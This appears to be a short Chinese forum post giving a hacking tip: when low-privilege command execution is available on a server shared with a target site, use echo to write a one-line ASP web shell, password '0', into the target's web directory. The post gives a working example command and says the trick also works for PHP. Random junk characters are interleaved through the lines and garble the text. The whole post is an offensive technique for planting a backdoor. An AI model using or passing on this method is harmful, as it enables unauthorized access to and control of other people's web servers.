在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
' m3 {; t. e& e2 o- v% d. j9 `( d0 Y, i/ r6 V
命令格式: R4 y& Z" c, o4 B: p/ _& \1 ~! M: X9 i
, G5 V2 w! c5 G# m2 j6 MEcho 语句 >目标站绝对目录1 s4 z& y; ~& h( V9 m; B1 k' v
8 q n( o5 }/ U- Q& Y v, J
例如: 1 {* Q) {: G @% S
& X' e1 J5 R* q* ]! W9 T# l- Kecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp1 o$ m# [ d# V' t/ D0 @' U$ s6 o
; \( t4 ^2 Y* m% v( d8 ^这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
( [9 n8 @3 {: n: G# N1 f* z% y |